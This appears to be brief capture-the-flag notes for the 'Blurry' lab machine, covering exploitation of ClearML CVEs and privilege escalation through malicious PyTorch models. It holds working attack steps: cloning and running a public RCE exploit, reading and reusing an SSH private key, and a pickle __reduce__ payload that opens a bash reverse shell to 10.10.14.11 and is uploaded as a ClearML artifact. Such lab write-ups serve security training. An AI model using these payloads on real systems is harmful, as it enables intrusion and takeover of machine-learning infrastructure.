box info
Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities ([CVE-2024-24590](https://nvd.nist.gov/vuln/detail/CVE-2024-24590) – [CVE-2024-24595](https://nvd.nist.gov/vuln/detail/CVE-2024-24595)) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with sudo is discovered. The program loads arbitrary PyTorch models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, fickling is used to scan the dataset for insecure pickle files , prior to loading the model. Malicious code can be injected into a model, using runpy to bypass the fickling checks.
Recon
ffuf -u http://10.10.11.19 -H "Host: FUZZ.blurry.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
shell jc
cve-2024-24590
use https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit/tree/main
git clone https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit.git
cd CVE-2024-24590-ClearML-RCE-Exploit
python3 exploit.py
first install package
pip install -r requirements.txt
pip install pwncat
change common shell
script /dev/null -c bash
^Z
stty raw -echo; fg
or ssh id_rsa
cat .ssh/id_rsa
# mkdir key file -> vi key
#copy the prikey
#chmod 600 key
ssh -i key username@host
shell root
model posion injection shell
use: https://hiddenlayer.com/innovation-hub/weaponizing-machine-learning-models-with-ransomware/
use custom shell
exploit_direct
import os
import torch
from clearml import Task
class RevShell:
def __reduce__(self):
return (os.system,("bash -c 'bash -i >& /dev/tcp/10.10.14.11/1788 0>&1'",))
torch.save(RevShell(),'pwn.pth')
task = Task.init(project_name="Black Swan", task_name="taskkc1", tags=["review"])
task.upload_artifact(name='pwned', artifact_object=RevShell(), retries=2, wait_on_upload=True, extension_name='.pkl')